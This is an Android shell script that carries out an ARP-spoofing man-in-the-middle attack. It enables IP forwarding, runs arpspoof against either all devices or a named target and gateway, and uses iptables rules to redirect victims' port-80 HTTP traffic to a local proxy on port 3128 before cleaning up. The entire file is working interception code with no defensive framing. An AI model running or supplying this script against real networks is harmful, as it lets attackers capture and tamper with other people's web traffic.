#!/system/bin/sh
# When this script the following are set:
# WLAN, IP, SUBNET, MASK, SHORTMASK
# ARPSPOOF, IPTABLES

# Detect a few settings

echo Current Wifi IP: $IP
echo Current subnet: $SUBNET
echo Subnet mask: $MASK

echo 1 > /proc/sys/net/ipv4/ip_forward

if [ "$1" = "all" ]
then
	echo "Starting ARP Spoofing for all devices"
	$ARPSPOOF -i $WLAN "$2" > /dev/null &
	ARP1="$!"
elif [ "$1" == "none" ]
then
	echo "Not arpspoofing at all."
else
	echo "Starting ARP Spoofing"
	$ARPSPOOF -i $WLAN -t "$1" "$2" > /dev/null &
	ARP1="$!"
	$ARPSPOOF -i $WLAN -t "$2" "$1" > /dev/null &
	ARP2="$!"
fi

$IPTABLES -P FORWARD ACCEPT # Android 4.0 requires this
$IPTABLES -t nat -A POSTROUTING -j MASQUERADE
$IPTABLES -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128

# Wait for finish
read

kill $ARP1 2>/dev/null
kill $ARP2 2>/dev/null

# Stop stuff

$IPTABLES -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
$IPTABLES -t nat -D POSTROUTING -j MASQUERADE


wait
